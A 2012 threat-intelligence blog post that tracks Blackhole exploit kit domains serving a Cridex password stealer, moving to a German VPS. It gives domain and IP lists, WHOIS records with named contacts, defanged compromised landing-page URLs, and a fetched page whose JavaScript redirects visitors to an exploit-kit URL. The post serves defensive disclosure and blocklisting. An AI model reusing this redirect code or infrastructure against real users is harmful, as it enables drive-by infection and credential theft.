Malware Must Die!: Update: The BHEK Users of Trojan Password Stealer BadActors is Shifting Their Evil Service into Germany VPS at AS25074 (SECURENETZ-DE)

Wednesday, December 12, 2012
Update: The BHEK Users of Trojan Password Stealer BadActors is Shifting Their Evil Service into Germany VPS at AS25074 (SECURENETZ-DE)

We our past three incident Spam to BlackHole(BHEK) Trojan Cridex (see below url's posts)
http://malwaremustdie.blogspot.jp/2012/11/full-disclosure-analysis-fake-facebook.html
http://malwaremustdie.blogspot.jp/2012/12/spam-wordpress-redirector.html
http://malwaremustdie.blogspot.jp/2012/12/fake-facebook-notification-leads-to.html
Was conducted by a CyberCrime Group with the evil DNS service exposed below:
http://malwaremustdie.blogspot.jp/2012/12/list-of-name-server-used-by-blackhole.html
We just spotted these criminals are continuing infection & moving their 
Blackhole2 Infector service into the Germany VPS: SECURENETZ-DE ,
as per details below: [PLEASE BLACKLIST THESE!]
ganiopatia.ru   A  212.162.52.180
pelamutrika.ru  A  212.162.52.180
aliamognoa.ru   A  212.162.52.180
ahiontota.ru    A  212.162.52.180
anifkailood.ru  A  212.162.52.180
genevaonline.ru A  212.162.52.180
podarunoki.ru   A  212.162.52.180
aseniakrol.ru   A  212.162.52.180
pitoniamason.ru A  212.162.52.180
dimarikanko.ru  A  212.162.52.180

ganiopatia.ru   A  212.162.56.210
pelamutrika.ru  A  212.162.56.210
aliamognoa.ru   A  212.162.56.210
ahiontota.ru    A  212.162.56.210
anifkailood.ru  A  212.162.56.210
genevaonline.ru A  212.162.56.210
podarunoki.ru   A  212.162.56.210
aseniakrol.ru   A  212.162.56.210
pitoniamason.ru A  212.162.56.210
dimarikanko.ru  A  212.162.56.210

ahiontota.ru    A  212.162.13.230 NEW DOMAINS in NEW VPS IP ADDRESS
anifkailood.ru  A  212.162.13.230
podarunoki.ru   A  212.162.13.230
aseniakrol.ru   A  212.162.13.230
pitoniamason.ru A  212.162.13.230
amnaosogo.ru    A  212.162.13.230
dimarikanko.ru  A  212.162.13.230
aofngppahgor.ru A  212.162.13.230 ←NEW DOMAIN [aofngppahgor.ru]
With the below WHOIS details:
inetnum:        212.162.56.0 - 212.162.57.255
netname:        SECURENETZ-DE
descr:          Secure-Netz
country:        de
admin-c:        NK1733-RIPE
tech-c:         MATT69-RIPE
status:         ASSIGNED PA
remarks:        all abuse reports to abuse@level3.com
mnt-by:         LEVEL3-MNT
mnt-lower:      LEVEL3-MNT
source:         RIPE # Filtered

person:         Matthew Duncalf
address:        Level (3) Communications
address:        Level 3 House
address:        66 Prescot Street
address:        London, E1 8HG UK
phone:          +44 20 7961 8468
fax-no:         +44 20 7864 0338
nic-hdl:        MATT69-RIPE
mnt-by:         LEVEL3-MNT
source:         RIPE # Filtered

person:         Nicole Kuehne
address:        Secure-Netz
address:        Am Plan 1
address:        37581 Bad Gandersheim
address:        Germany
phone:          +49 5382 953600
fax-no:         +49 5382 953610
nic-hdl:        NK1733-RIPE
mnt-by:         LEVEL3-MNT
source:         RIPE # FilteredConrad of Dynamoo blog is also have same reference of 
these new service (grep IP of 212.162.*) -->>[HERE]

Spam Infector Redirection URL List
Below is the PoC by the spam emails infected url infector landing pages:
h00p://www.jiaenhospital.com/mail.htm
h00p://www.brsams.com/mail.htm
h00p://sat-tesero.it/mail.htm
h00p://mondoimmobiliare2010.com/mail.htm
h00p://www.fevaweb.org.ar/mail.htm
h00p://www.sddongrun.com/mail.htm
h00p://revolverresine.com/mail.htm
h00p://www.freemusicdownloads.eu/mail.htm
h00p://www.migar.cn/mail.htm
h00p://www.sp3zory.webd.pl/mail.htm
h00p://www.vyborpodarka.ru/mail.htm
h00p://latinchat.ca/mail.htm
h00p://www.templodoaprendiz.com.br/mail.htm
h00p://haxlzxs.com/mail.htm
h00p://azlj365.com/mail.htm
h00p://modaencuba.com/mail.htm
h00p://naohide.com/mail.htm
h00p://ulbakompleks.kz/mail.htm
h00p://www.freelink.com.cn/mail.htm
h00p://www.appchat.cn/mail.htm
h00p://www.abbeyhealthcare.co.uk/mail.htm
h00p://www.kaizer.cn/mail.htm
h00p://www.lkedu8.com/mail.htm
h00p://www.institutogv.com.ar/mail.htm
h00p://mekka-digital.hu/mail.htm
  :
Log:
$ date
Wed Dec 12 20:00:40 JST 2012

$ Xurl h00p://www.jiaenhospital.com/mail.htm|less
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   422  100   422    0     0     88      0  0:00:04  0:00:04 --:--:--   133
＜html＞
 ＜head＞
  ＜meta http-equiv="Content-Type" content="text/html; charset=utf-8"＞
＜title＞Please wait＜/title＞
 ＜/head＞
 ＜body＞
＜h1＞＜b＞Please wait a moment ... You will be forwarded... ＜/h1＞＜/b＞
＜h4＞Internet Explorer / Mozilla Firefox compatible only＜/h4＞＜br＞

＜script＞
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://aseniakrol.ru:8080/forum/links/column.php";}
＜/script＞

＜/body＞
＜/html＞

$ host -ta aseniakrol.ru
aseniakrol.ru has address 212.162.52.180
aseniakrol.ru has address 212.162.56.210
 .
I hope the authority will shutdown their domains & DNS soon, for these criminals -
are VERY eager to steal credentials from innocent in daily basis.
For the Secure-Netz,De, please help to shutdown the usage of these domains under -
your VPS immediately.
#MalwareMustDie